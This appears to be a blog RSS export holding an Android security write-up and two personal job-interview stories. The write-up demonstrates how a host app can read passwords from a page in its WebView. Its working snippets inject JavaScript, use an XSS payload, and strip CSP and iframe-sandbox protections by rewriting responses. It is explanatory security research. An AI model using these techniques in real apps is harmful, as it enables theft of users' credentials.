<![CDATA[nuckingfoob]]>http://localhost:2368/http://localhost:2368/favicon.pngnuckingfoobhttp://localhost:2368/Ghost 3.4Fri, 03 Apr 2020 05:39:57 GMT60<![CDATA[Android Webview Exploited]]>http://localhost:2368/android-webview-csp-iframe-sandbox-bypass/5e7708b8ecde6b1e97596819Tue, 24 Mar 2020 07:23:33 GMTThere are plenty of articles explaining the security issues with android webview, like this article & this one. Many of these resources talk about the risks that an untrusted page, loaded inside a webview, poses to the underlying app. The threats become more prominent especially when javascript  and/or the javascript interface is enabled on the webview.

In short, having javascript enabled & not properly fortified allows for execution of arbitrary javascript in the context of the loaded page, making it quite similar to any other page that may be vulnerable to an XSS. And again, very simply put, having the javascript interface enabled allows for potential code execution in the context of the underlying android app.

In many of the resources, that I came across, the situation was such that the victim was the underlying android app inside whose webview a page would open either from it's own domain or from an external source/domain. While attacker was the entity external to the app, like an actor exploiting a potential XSS on the page loaded from the app's domain (or the third party domain from where the page is being loaded inside the webview itself acting malicious). The attack vector was the vulnerable/malicious page loaded in the the webview.

This blog talks about a different attack scenario!

Victim: Not the underlying android app, but the page itself that is being loaded in the webview.

Attacker: The underlying android app, in whose webview the page is being loaded.

Attack vector: The vulnerable/malicious page loaded in the the webview.(through the abuse of the insecure implementations of some APIs)

The story line

A certain product needs to integrate with a huge business. Let us call this huge business as BullyGiant & the certain product as AppAwesome from this point on.  

Many users have an account on both AppAwesome & also on BullyGiant. The flow involves such users of BullyGiant to check out on their payments page with AppAwesome. Every transaction on AppAwesome requires to be authenticated & authorized by the user by entering their password on the AppAwesome's checkout page, which appears before any transaction is allowed to go through.

AppAwesome cares about the security of it's customers. So it proposes the below security measures to anyone who wants to integrate with them, especially around AppAwesome's checkout page.

  1. Loading of the checkout page using AppAwesome's SDK. All of the page & it's contents are sandboxed & controlled by the SDK. This approach allows for maximum security & the best user experience.
  2. Loading of the checkout page on the underlying browser (or custom chrome tabs, if available). This approach again has quite decent security (limited by of course the underlying browser's security) but not a very good user experience.
  3. Loading of the checkout page in the webview of the integrating app. This is comparatively the most insecure of the above proposals, although offers a better user experience than the second approach mentioned above.

Now the deal is that AppAwesome is really very keen on securing their own customers' financial data & hence very strongly recommends usage of their SDK. BullyGiant on the other hand, for some reason, (hopefully justified) does not really want to abide by the secure integration proposals by AppAwesome. AppAwesome does have a choice to deny any integration with BullyGiant. However, this integration is really crucial for AppAwesome to provide a superior user experience to it's own users & in fact even more crucial for AppAwesome to stay in the game.

So AppAwesome gives in & agrees to integrate with BullyGiant succumbing to their terms of integration, i.e. using the least secure webview approach. The only things that protect AppAwesome's customers now is the trust that AppAwesome has on BullyGiant, which is somewhat also covered through the legal contracts between AppAwesome & BullyGiant. That's all.

Technical analysis (TL;DR)

Thanks: Badshah & Anoop for helping with the execution of the attack idea. Without your help, this blog post would not have been possible, at least not while it's still relevant :)

Below is a tech analysis of why webview is a bad idea. It talks about how can a spurious (or compromised) app abuse webview features to extract sensitive data from the page loaded inside the webview, despite the many security mechanisms that the page, being loaded in the webview, might have implemented. We discuss in details, with many demos, how CSP, iframe sandbox etc. may be bypassed in android webview. Every single demo has a linked code base on my Github so they could be tried out first hand. Also, the below generic scheme is followed (not strictly in that order) throughout the blog:

  1. A simple demo of the underlying concepts on the browser & android webview
  2. Addition of security features to the underlying concepts & then demo of the same on the browser & android webview
NB: Please ignore all other potential security issues that might be there with the code base/s

Case 1: No protection mechanisms

Apps used in this section:

  1. AppAwesome
  2. BullyGiant

AppAwesome when accessed from a normal browser:

Vanilla AppAwesome Landing Page - Browser

And on submitting the above form:

Vanilla AppAwesome Checkout Page -Browser

AppAwesome when accessed from BullyGiant app:

Vanilla AppAwesome Page - Android Webview

Notice the Authenticate Payment web page is loaded inside a webview of the BullyGiant app.

And on submitting the form above:

Vanilla AppAwesome Page - Android Webview

Notice that clicking on the Submit button also displays the content of the password field as a toast message on BullyGiant. This proves how the underlying app may be able to sniff any data (sensitive or otherwise) from the page loaded in it's webview.

Under the BullyGiant hood

The juice of why BullyGiant was able to sniff password field out from the webview is because it is in total control of it's own webview & hence can change the properties of the webview, listen to events etc. That is exactly what it is doing. It is

  1. enabling javascript on it's webview &
  2. then it is listening for onPageFinished event

Snippet from BullyGiant:

    ...
    final WebView mywebview = (WebView) findViewById(R.id.webView);
    mywebview.clearCache(true);
    mywebview.loadUrl("http://192.168.1.38:31337/home");
    mywebview.getSettings().setJavaScriptEnabled(true);
    mywebview.setWebChromeClient(new WebChromeClient());
    mywebview.addJavascriptInterface(new AppJavaScriptProxy(this), "androidAppProxy");
    mywebview.setWebViewClient(new WebViewClient(){
        @Override
        public void onPageFinished(WebView view, String url) {...}
    ...

Note that there is addJavascriptInterface as well. This is what many blogs (quoted in the beginning of this blog) talk about where the loaded web page can potentially be harmful to the underlying app. In our use case however, it is not of much consequence (from that perspective). All that it is used for is to show that BullyGiant could read the contents of the page loaded in the webview. It does so by sending the read content back to android (that's where the addJavascriptInterface  is used) & having it displayed as a toast message.

The other important bit in the BullyGiant code base is the over ridden onPageFinished() :

    ...
    super.onPageFinished(view, url);
    mywebview.loadUrl("javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ androidAppProxy.showMessage(\"Password : \" + document.getElementById(\"password\").value); return false; },false);");
    ...

That's where the javascript to read the password filed from the DOM is injected into the page loaded inside the webview.

The story line continued...

AppAwesome came about with the below solutions to prevent the web page from being read by the underlying app:

Suggestion #1: Use CSP

Use CSP to prevent BullyGiant from executing any javascript whatsoever inside the page loaded in the iframe

Suggestion #2: Use Iframe Sandbox

Load the sensitive page inside of an iframe on the main page in the webview. Use iframe sandbox to restrict any interactions between the parent window/page & the iframe content.

CSP is a mechanism to prevent execution of  untrusted javascript inside a web page. While the sandbox attribute of iframe is a way to tighten the controls of the page within an iframe. It's very well explained in many resources like here.

With all the above restrictions imposed, our goal now would be to see if BullyGiant can still access the AppAwesome page loaded inside the webview or not. We would go about analyzing how each of the suggested solutions work in a normal browser & in a webview & how could BullyGiant access the loaded pages if at all.

Exploring CSP With Inline JS

Apps used in this section:

  1. AppAwesome
  2. BullyGiant

Before moving on to the demo of CSP implementation & it's effect/s on Android Webview, let's look at how a non-CSP page behaves in the normal (non-webview) browser & a webview.

To demo this we have added an inline JS that would alert 1 on clicking of the submit button before proceeding to the success checkout page. AppAwesome code snippet:

<!DOCTYPE HTML>
    ...
    <script type="text/javascript">
      function f(){
        alert(1);
      }
    </script>
    ...
      <input type="submit" value="Submit" name="submit" name="submit" onclick="f();">
    ...
</html>

AppAwesome when accessed from the browser & when Submit button is clicked:

Vanilla AppAwesome Page - Inline JS => Firefox 74.0

AppAwesome when accessed from BullyGiant app:

Vanilla AppAwesome Page - Inline JS => Android Webview

The above suggests that so far there is no change in how the page is treated by the 2 environments. Now let's check the change in behavior (if at all) when CSP headers are implemented.

With CSP Implemented

Apps used in this section:

  1. AppAwesome
  2. BullyGiant

Browser

A quick demo of these features on a traditional browser (not webview) suggests that these controls are indeed useful (when implemented the right way) with what they are intended for.

AppAwesome when accessed from a browser:

CSP AppAwesome page - Inline JS => Firefox 74.0

Notice the Content Security Policy violations. These violations happen because of the CSP response headers, returned by the backend & enforced by the browser.

Response headers from AppAwesome:

CSP AppAwesome page - Inline JS => Firefox 74.0

Android Webview

AppAwesome when accessed from BullyGiant gives the same Authenticate Payment page as above & the exact same CSP errors too! This can be seen from the below screenshot of a remote debugging session taken from Chrome 80.0:

(Firefox was not chosen for remote debugging because I was lazy to set up remote debugging on Firefox. Firefox set up on the AVD was required too :( as per this from the FF settings page. Also further down for all the demos we use adb logs instead of remote debugging sessions to show browser console messages)

On Google Chrome 80.0

Hence, we see that CSP does prevent execution of inline JS inside android webview, very much like a normal browser does.

Exploring CSP With Injected JS

Apps used in this section:

  1. AppAwesome
  2. AppAwesome (with XSS-Auditor disabled)
  3. BullyGiant (without XSS payload)
  4. BullyGiant (with XSS payload)

AppAwesome has been made deliberately vulnerable to a reflected XSS by adding a query parameter, name, to the home page. This param is vulnerable to reflected XSS. Also, all inline JS has been removed from this page to further emphasize on CSP's impact on injected JS.

AppAwesome when accessed from the browser while the name query parameter's value is John Doe:

On Google Chrome 80.0

Now, for the sake of the demo, we would exploit the XSS vulnerable name query param to add an onclick event to the Submit button such that clicking it would alert "injected 1"

XSS exploit payload

<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}</script>

AppAwesome when accessed from the browser & exploited with the above payload (in name query parameter):

Vanilla AppAwesome Page - Exploited XSS => Firefox

AppAwesome when accessed from BullyGiant, without exploiting the XSS:

Vanilla AppAwesome Page - Vulnerable param => Android Webview

AppAwesome when accessed from BullyGiant, while attempting to exploit the XSS, produces the same screen as above, however, contrary to the script injection that was successful in case of a normal browser, this time clicking on the Submit button didn't really execute the payload at all. We were instead taken directly to the checkout page. Adb logs however did produce an interesting message as shown below:

Vanilla AppAwesome Page - Exploited XSS => Android Webview

The adb log messages is:

03-27 12:29:33.672 26427-26427/com.example.webviewinjection I/chromium: [INFO:CONSOLE(9)] "The XSS Auditor refused to execute a script in 'http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.", source: http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E (9)

So without even any explicit protection mechanism/s (like CSP or iframe sandbox), android webview seems to have a default protection mechanism called XSS Auditor. This however has nothing to do with our use case. Moreover, it hinders with our demo as well.  Hence, for now, for the sake of this demo, we would make AppAwesome return X-XSS-Protection HTTP header, as below, to take care of this issue.

X-XSS-Protection: 0

Note: As an auxiliary, XSS Auditor would also be accounted for a bypass towards the end of the blog :)

AppAwesome when accessed now from BullyGiant, while attempting to exploit the XSS:

Vanilla AppAwesome Page - Exploited XSS => Android Webview

Thus we see that the XSS payload works equally well even in the Android Webview (of course with the XSS Auditor intentionally disabled).

Note: If the victim is the page getting loaded inside webview, it makes absolute sense that it's backend would never ever return any HTTP headers, like the above, that possibly weakens the security of the page itself. We will see why this is irrelevant further down.

The other thing to note is that there was a subtle difference between how the payloads were injected in the vulnerable parameter in both the cases, the browser & the webview. And it is important to take note of it because it highlights the very premise of this blog post. In case of the browser, the attacker is an external party, who could send the JS payload to be able to exploit the vulnerable name parameter. Whereas in case of the android webview, the underlying app itself is the malicious actor & hence it is injecting the JS payload in the vulnerable name parameter before loading the page in it's own webview. This difference would be more prominent when we analyze further cases & how the malicious app leverages it's capabilities to exploit the page loaded in the webview.

With CSP Implemented

Apps used in this section:

  1. AppAwesome
  2. BullyGiant (with XSS payload)
  3. BullyGiant (with CSP bypass)
  4. BullyGiant (with CSP bypass reading the password field)

Browser

With the appropriate CSP headers in place, inline JS does not work in browsers as we saw above. What would happen if javascript is injected in the page that has CSP headers? Would it still have CSP violation errors?

AppAwesome, with vulnerable name parameter & XSS-Auditor disabled, when accessed in the browser & the name query param exploited with the same XSS payload (as earlier):

CSP AppAwesome Page - Exploited XSS => Firefox

The console error messages are the same as with inline JS. Injected JS does not get executed as the CSP policy prevents it. Would the same XSS payload work when the above CSP page is loaded inside Android Webview?

AppAwesome when accessed from BullyGiant app that injects the JS payload in the vulnerable name parameter before loading the page in the android webview:

CSP AppAwesome Page - Exploited XSS => Android Webview

The same adb log is produced confirming that CSP works well in case of even injected javascript payload inside a webview.

Note: In the CSP related examples above (browser or webview) note that CSP kicks in before the page actually gets loaded.

With the above note, some interrelated questions that arise are:

  1. What would happen if BullyGiant wanted to access the contents of the page after it get successfully loaded?
  2. Could it add javascript to the already loaded page, as if this were being done locally?
  3. Would CSP still interfere?

Since the webview is under the total control of the underlying app, in our case BullyGiant, & since there are android APIs available to control the lifecycle of pages loaded inside the webview, BullyGiant could pretty much do whatever it wants with the loaded page's contents. So instead of injecting the javascript payload in the vulnerable parameter, as in the above example, BullyGiant may choose to instead inject it directly in the page itself after the page is loaded, without having the need to actually exploit the vulnerable name parameter at all.

AppAwesome when accessed from BullyGiant that implements the above trick to achieve JS execution despite CSP:

CSP AppAwesome Page - Exploited XSS => Android Webview

The logs still show the below message:

03-28 17:29:28.372 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-JkQD9ejf-ohUEh1Jr6C22l1s4TUkBIPWNmho0FNLGr0='), or a nonce ('nonce-...') is required to enable inline execution.
03-28 17:29:28.396 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.

BullyApp still injected XSS payload in the vulnerable name parameter (we left it there to ensure that CSP was still in action). The above logs are a result & proof of that.

Code snippet from BullyGiant that does the trick:

        ...
        mywebview.setWebViewClient(new WebViewClient(){
            @Override
            public void onPageFinished(WebView view, String url) {
                super.onPageFinished(view, url);
                mywebview.loadUrl(
                        "javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ alert(\"injected 1\"); },false);"
                );
            }
        });
        ...

The above PoC shows execution of simple JS payload that just pops up an alert box. Any other more complex JS could be executed as well, like reading the contents of the password field on the page using the below payload

var secret = document.getElementById("password").value; alert(secret);

AppAwesome when accessed from BullyGiant that attempts to read the password field using the above payload:

CSP AppAwesome Page - Exploited XSS => Android Webview

So the questions above get answered. Also, it is indicative of an even more interesting question now:

Since BullyApp is in total control of the webview & thus the page loaded within it, would it also be able to modify the whole HTTP response itself ?

We will tackle the above question with yet another example. In fact, this time we would talk about the second suggestion around iframe sandbox and see if the answer to the above question could be demoed with that. Also, we had left out the whole X-XSS-Protection header thing for later. That part will also get covered with the following experiments.

Iframe sandbox attribute

Apps used in this section:

  1. AppAwesome Backend (without CSP & with iframe sandbox)
  2. AppAwesome Backend (without CSP & with iframe sandbox relaxed)
  3. BullyGiant

AppAwesome, that has no CSP headers, that has X-XSS-Protection relaxed & has the below sandbox attributes

sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"

when loaded in the browser:

AppAwesome Page - Iframe Sandbox => Browser

The child page has the form which when submitted displays the password on the checkout page inside the iframe as:

AppAwesome Page - Iframe Sandbox => Browser

The Access button tries to read the password displayed inside iframe by reading the DOM of the page loaded in the iframe using the below JS

...
  	<script type="text/javascript">
  		function accessIframe()
  		{
  			document.getElementById('myIframe').style.background = "green"  			
  			alert(document.getElementById('myIframe').contentDocument.getElementById('data').innerText);
  		}
  	</script>
...

Note that even in the absence of CSP headers clicking the Access button gives:

AppAwesome Page - Iframe Sandbox => Browser

The console message is:

TypeError: document.getElementById(...).contentDocument is null

This happens because of the iframe's sandbox attribute. The iframe sandbox can relaxed by using:

<iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-same-origin allow-top-navigation allow-forms allow-popups">

AppAwesome, with relaxed iframe sandbox attribute, allows the JS in the parent page to access the iframe's DOM, thus producing the alert box as expected, with the mysecret value:

AppAwesome Page - Iframe Sandbox => Browser

Also, just a side note, using the below would have also relaxed the sandbox to the exact same effect as has also been mentioned here:

<iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-scripts allow-same-origin allow-top-navigation allow-forms allow-popups">

Repeating the same experiment on android webview again produces the exact same results.

AppAwesome, with relaxed iframe sandbox attribute when accessed from BullyGiant

AppAwesome Page - Iframe Sandbox Relaxed=> Android Webview

AppAwesome, that has no CSP headers, that has X-XSS-Protection relaxed & has the below sandbox attributes

sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"

when accessed from BullyGiant:

AppAwesome Page - Iframe Sandbox => Android Webview

The error message in the console is:

03-29 15:18:38.292 11081-11081/com.example.webviewinjection D/WebView Console Error:: Uncaught SecurityError: Failed to read the 'contentDocument' property from 'HTMLIFrameElement': Sandbox access violation: Blocked a frame at "http://192.168.1.34:31337" from accessing a frame at "http://192.168.1.34:31337".  The frame being accessed is sandboxed and lacks the "allow-same-origin" flag.

Now if BullyGiant were to bypass the above restriction, like it did in the case of CSP bypass, it could again take the same route of injecting some javascript inside the iframe itself after the checkout page is loaded.

Note: I haven't personally tried this approach, but conceptually it should work. Too lazy to do that right now !

But instead of doing that what if BullyApp were to take an even simpler approach to bypassing everything once & for all? Since the webview is under the total control fo BullyGiant could it not intercept the response before rendering it on the webview and remove all the trouble making headers altogether?

Manipulation of the HTTP response

Apps used in this section:

  1. AppAwesome Backend (with all protection mechanisms in place)
  2. BullyGiant (that bypasses all the above mechanisms)
  3. BullyGiant app with a toast

Let's make this case the most secure out of all the previous ones. So this time the AppAwesome implements all secure mechanisms on the page. Below is a list of such changes:

  1. It uses CSP => so that no unwanted JS (inline or injected) could be executed.
  2. It uses strict iframe sandbox attributes => so that the parent page can not access the contents of the iframe despite them being from the same domain.
  3. It does not set the X-XSS-Protection: 0 header => this was an assumption we had made above for the sake of our demos. In the real world, an app that wishes to avoid an XSS scenario would deploy every possible/feasible mechanism to prevent it from happening. So AppAwesome now does not return this header at all.
  4. It does not have the Access button on the DOM with the inline JS => again something that we had used in few of our (most recent) previous examples for the sake of our demo. In the real world, in the context of our story, it would not make sense for AppAwesome to leave an Access button with the supporting inline JS to access the iframe.

AppAwesome when accessed from the browser:

AppAwesome Page - FullBlown => Browser

Notice that all the security measures mentioned in the pointers above are implemented. CSP headers are in place, there's no Access button or the supporting inline JS, no X-XSS-Protection header & the strict iframe sandbox attribute is present as well.

BullyGiant handles all of the above trouble makers by handling everything before any response is rendered onto the webview at all,

AppAwesome 0 BullyGiant 1 !

AppAwesome when accessed from BullyGiant:

AppAwesome Page - FullBlown => Android Webview

Notice that the X-XSS-Protection: 0 header has been added ! The CSP header is no longer present ! And there's (the old familiar) brand new Access button on the page as well. Clicking the Access button after the form inside the iframe is loaded gives:

AppAwesome Page - FullBlown => Android Webview

Code snippet from BullyGiant that does all the above trick:

...
class ChangeResponse implements Interceptor {
    @Override public Response intercept(Interceptor.Chain chain) throws IOException {
        Response originalResponse = chain.proceed(chain.request());
        String responseString = originalResponse.body().string();
        Document doc = Jsoup.parse(responseString);
        doc.getElementById("myIframe").removeAttr("sandbox");
        MediaType contentType = originalResponse.body().contentType();
        ResponseBody body = ResponseBody.create(doc.toString(), contentType);

        return originalResponse.newBuilder()
                .body(body)
                .removeHeader("Content-Security-Policy")
                .header("X-XSS-Protection", "0")
                .build();
    }
};
...
...
    private WebResourceResponse handleRequestViaOkHttp(@NonNull String url) {
        try {
            final OkHttpClient client = new OkHttpClient.Builder()
                    .addInterceptor(new LoggingInterceptor())
                    .addInterceptor(new ChangeResponse())
                    .build();

            final Call call = client.newCall(new Request.Builder()
                    .url(url)
                    .build()
            );

            final Response response = call.execute();
            return new WebResourceResponse("text/html", "utf-8",
                    response.body().byteStream()
            );
        } catch (Exception e) {
            return null; // return response for bad request
        }
    }
...
...
       mywebview.setWebViewClient(new WebViewClient(){
            @SuppressWarnings("deprecation") // From API 21 we should use another overload
            @Override
            public WebResourceResponse shouldInterceptRequest(@NonNull WebView view, @NonNull String url) {
                return handleRequestViaOkHttp(url);
            }
...

What the above does is intercept the HTTP request that the webview would make & pass it over to OkHttp, which then handles all the HTTP requests & response from that point on, before finally returning back the modified HTTP response back to the webview.

Ending note:

Before we end, a final touch. BullyGiant was able to access the whole of the page loaded inside webview. This was demoed using JS alerts on the page itself. The content read from the webview could actually also be displayed as native toast messages, to make it more convincing for the business leaders (or anyone else), accentuating that the sensitive details from AppAwesome are actually leaked over to BullyGiant.

AppAwesome when accessed from BullyGiant:

AppAwesome Page - FullBlown => Android Webview - Raising a toast!

Conclusion

Theoretically since the webview is under total control of the underlying android app, it is wise to not share any sensitive data on the page getting loaded inside the webview.

Collected on the way

git worktrees
what are git tags & how to maintain different versions using tags
creating git tags
checking out git tags
pushing git tags
tags can be viewed simply with git tag
git tags can not be committed to => For any changes to a tag, commit the changes on the or a new branch and then make a tag out of it. Delete the olde tag after that if you want
deleting a branch local & remote
rename a branch local & remote
adding chrome console messages to adb logs
chrome's remote debugging feature

]]>
<![CDATA[That Dream Job]]>http://localhost:2368/that-dream-job/5e42cb83b9fad24fb261034cTue, 11 Feb 2020 15:44:00 GMTNot that I was desperately looking out for a change at this point in time, but appearing for the selection process of different companies, for an information security role, has always been a brutal teacher. And although I was fortunate to crack some of those, I am particularly more delightful about the other kind, for those have been the real fun ones. And then of-course, some names have always struck a keen desire in me, even before I was eligible to be employed full-time, to get an opportunity to work with their teams to experience the brilliant and that culture and values. And trust me, for names like these, I don’t really need to be ‘desperately’ looking out for a change. It’s roles/companies like these that help me understand the term ‘best’ (which is otherwise quite vague and relative) that I like to call a dream job.

LinkedIn happens to be one such phenomenon, that I would readily be very positive about, from an employment perspective, unless of-course I am already into something that’s analogous to ‘saving the world’ or am already working with people like the above. Having like minded friends is always a boon. Thanks to one such friend (Avradeep Bhattacharya), my profile caught the recruitment team’s attention. What follows now is a narration of my personal experience with the entire selection process.

It might get a little too melodramatic. But that’s how it was. You have been warned !

My friend confirmed about forwarding my profile to the respective hiring team on a Wednesday. The following Thursday is when I received an introductory email from the recruitment team at LinkedIn which was soon followed by a call to discuss the opportunity and my interests further. A sweet mid 20s voice with an absolute professional tone acknowledged my ‘Hello’ and off we went to the very first step of the selection procedure. I was briefed about the role, the kind of people that I would be working with, the location etc. And I think, I blabbered a lot about my experience and why exactly was I keen on this opportunity. (It was the excitement speaking, not me ! :)) But I guess I did a fair job at it, because at the end of it, the lady at the other end seemed convinced and we ended on the note that the ball was now in the hiring manager’s court and that if the manager sees my profile a fit, I would be contacted back soon.

I ‘chillaxed’ while waiting for a call. And the general idea is 2–3 days, or more sometimes (or sometimes no intimation at all), before you get the next call. But LinkedIn takes ‘soon’ literally seriously. ‘Ping’ ! within the next 30 minutes of the previous interaction and acceleration in beats per second. The next thing I knew, was that the next round had been arranged as the hiring manager seemed interested in giving me a shot.

Round 1:

‘Soon’ again, there was a challenge that was shared with me. I was supposed to solve it and send back my thoughts about the same and possibly the solution too. I was given around 48 hours to complete the challenge. Now although the instructions in the challenge mentioned that ‘ideally’ it could be done within 2–3 hours at max, I wanted to take all the time available and, being the stubborn me, give it one shot after the other aiming at making it a little better each time.

Because it was and still is confidential as I understand, I may not be able to share the exact details of the challenge. However, I would like to share whatever I can being in the scope of the non-disclosure. Getting started with the instructions file, the requirements and expectations were crystal clear. The challenge itself, was quite opposite, at least from it’s first looks. It was not before some some 30–45 minutes of dedicated poking and playing around that I got a basic grasp of what exactly was I dealing with. Dinner break. Later that same evening, between shots of dark caffeine, it was another 3–4 hours it took to finally come up with a working PoC that satisfied the bare minimum expectation. Sigh! “That was cool” is what reverberated till I guess I slept it over. The following day, since I had all the time till the final hours, there was war on Stack overflow, Facebook, numerous blogs and discussion forums etc. around things I kept exploring and asking and debating to make the solution better and achieve what I wanted to. The challenge was not the challenge itself, it was the fact that the exact thing itself, being confidential, could not be shared. The questions had to be very vague and abstract and generic. And there was lot of criticism and down votes around the questions I was asking. I could not have expected for more. I mean, I was asking X in my questions and was trying to get an answer for Y. :) But at the end, although I did not receive the answer I was looking for, what I did come across through all the research etc. was n number of ways of attempting what I was trying to do and finally realize that whatever I was trying to do, was not feasible at all given the problem statement at hand. Cool right ? Anyway, the solution was finally submitted in the 11th hour. And as all the 11th hour things ought to mess up, my submission was no exception either. First I missed the attachment in the email. Then I sent the wrong attachment in the second email. And the final submission, witht the right PoC attached, had a little ambiguous instructions about how to run the PoC. :) But, it soon hit, that 3 iterations for one mail is more than enough. And I just left it there.

Round 2:

‘Soon’ once again, my solution sailed me through into the next round.
A late night phone call was arranged with a senior engineer in the team, whose LinkedIn profile was shared across beforehand. (The call was actually rescheduled for later that night, at my convenience, as the interviewer had to attend to some urgent stuff at the previously scheduled time) The profile was pretty impressive. The intimidation was intense and so was my eagerness about the call. It was the high school exam days revisited when you feel that you are prepared, yet you are all apprehensive.
It’s a quality I think a lot of folks have picked up at LinkedIn (or maybe it’s just a character you build with maturity), the guy’s voice was extremely polite and humble, yet absolutely professional. He gave a small introduction about himself and his role. I followed his cue and gave mine as well, this time ensuring that it’s me doing the talking and not the excitement, trying to pick up something from the demeanor of the interviewer. Mostly the discussion revolved around an in depth understanding of some very basic technologies. I was not very fast in answering them, because frankly I had to think about the questions and cross-questions that were thrown depending on my answers, but I guess I could cover most of them at an ok pace. There was one question though that I could not answer despite my making an attempt at it, because I did not know about that technical aspect at all.
It was a good discussion I would say, for I was forced to think through problems given and not just produce an answer by the books. I could easily relate to real world problems through the situations that were presented by the interviewer. The questions all made perfect sense such that they were encapsulating real world issues and were not just theoretical out of thin air.

Conclusion

This time it was a long wait. I was 80% sure to get back an affirmative call and an entry into the next round of the process. Alas! LinkedIn had plans otherwise. :) Being an extended weekend, I received a mail on the first working day following the long weekend informing me that the hiring team did not see me fit at that point in time for the opening. I am not certain now where did I miss it. As much as I would have liked to be promoted to the next round, I am certain there was reason enough to believe that I had something missing for that role. Upon request, I also received a feedback from LinkedIn hiring team about the areas I could improve on. But overall, I think the entire experience was really smooth and fun and above all pretty fruitful.

And of-course, I would still be looking out for one of these dream jobs, for if nothing, it is such experiences that really count.
Cheers ! :)

PS: Now that it's been almost 3+ years since I interviewed for this position, I would try to post a tech blog post as well around the challenge itself.

]]>
<![CDATA[Yet Another Nice Discussion]]>http://localhost:2368/yet-another-nice-discussion/5e42c92bb9fad24fb261033fTue, 11 Feb 2020 15:40:24 GMTHow often are you greeted by one Cooper as you walk in for a discussion with your next potential employer. Seldom, at least in the IT world. Oh and in case Cooper didn’t really ring a bell, it’s a handsome, playful ball of Retriever furs we are talking about. We bonded in the first sight and if only Cooper could speak, no alternate job offer could have ever matched that. But, guess it was better that way, for who knows Cooper would have said, “Dude, seriously, stop playing with me and focus on your interview. It’s POSTMAN not your regular stuff … woff ! woff ! “

So here’s another of those very unique and interesting experiences I had with the folks @POSTMAN. And if you’re a developer, either you already know of POSTMAN or you are just primitive, in which case here’s something to get you back to the future: https://www.getpostman.com/apps
Now although I have recently been lucky to have discussions, in person and over technology, with the class of people called co-founders of yet another phenomenon called start-ups, this particularly was unique with respect to quite a few things (including Cooper of course).

To begin with, it was my first time ever that I actually witnessed firsthand of what I had only heard of until now, revolutionary stuff all taking place in `that` magical garage. Be it Jobs’, Gates’, Bezos’ or that Menlopark Google’s or Disney’s, all of these magical garages were the birthplace of some of the biggest names we know of today. POSTMAN clearly was not a garage, guess primarily due to economic growth, allowing entrepreneurs to move on and think outside the garage now, but it was not a picture that anyone would usually paint of an office, a corporate or even otherwise. An apartment with 2 floors, each having a 3 BHK flat, brewing with coffee and ideas, with the hall reserved for some COD, GOW, FIFA, WWE or Cooper time, the balcony overlooking the kitchen and folks who were trying to figure out the age of a wine bottle I suppose.

But this was just superficial. The real fun was when I had this discussion with a young gentleman who looked in his late 20s, or so I thought, until he broke it across (and which anyone would otherwise also guess after speaking to him for some time) that he had been working in IT since the late 90s or so and has been a part of some great products of its time. And maybe I have not spoken to as many co-founders, but I hardly have seen a few who are so transparent in their discussions about a lot of stuff, their company, your candidature etc. and even less have I seen people sharing across their pretty insightful professional experiences with you on a first meeting. Ok, now there were a lot of instances where I was in disagreement with his views or ideology, but worth appreciating was that although he was strong about his points, he wasn’t obnoxiously arrogant about them and was instead quite open and humble to discuss about them, which to me justified his maturity.

Of the many things we discussed, the ones that fascinated me was stuff around how and why POSTMAN grew from a few hundreds to now over a million developers. Why was POSTMAN not just a make do product, but one that had a solid ideology behind its engineering designs. How exactly were the engineers die hard geeks at what they did and why were they happy doing it. And all of these was accompanied with examples, often more than one, which you could actually see in their product or their work culture. Why was ‘flat hierarchy’ and ‘management transparency’ not just 1337 speak (or so some would believe)but rather stuff you could see in front of you and relate to. What were the challenges that POSTMAN was aiming at next and what scale meant to them. And am sure, even if some of us might have had the above talk sometime, with someone, but this one is hard to beat. It was my first time that I was taken around that house (which some would prefer calling an office, not me and also not the POSTMANs am sure would), introduced to the engineers and finally even take a peek (officially, no shoulder surfing or any of those stunts) at their systems, what they were designing, what they were currently working on, what they had in the box for me, what was the roadmap ahead etc. I mean that’s like what happens after you join a company right ? It was amazing. It was a nice feeling to realize that I was considered for the offered position @Postman. And that reminds me, even before this entire Cooper and the following picture was laid out, there were 3 rounds of talks (technical and otherwise) that I had with the co-founders and engineers @POSTMAN on different occasions laid over a period of a week or so. The discussions were mostly around architecturally what were they looking out from a potential candidate and questions which were, I guess, to primarily measure the technical acumen of the candidate. I have had better technical questions asked in other occasions though, but this still was nice in the terms that it sort of portrayed where they were facing difficulties and how were they planing on addressing them.

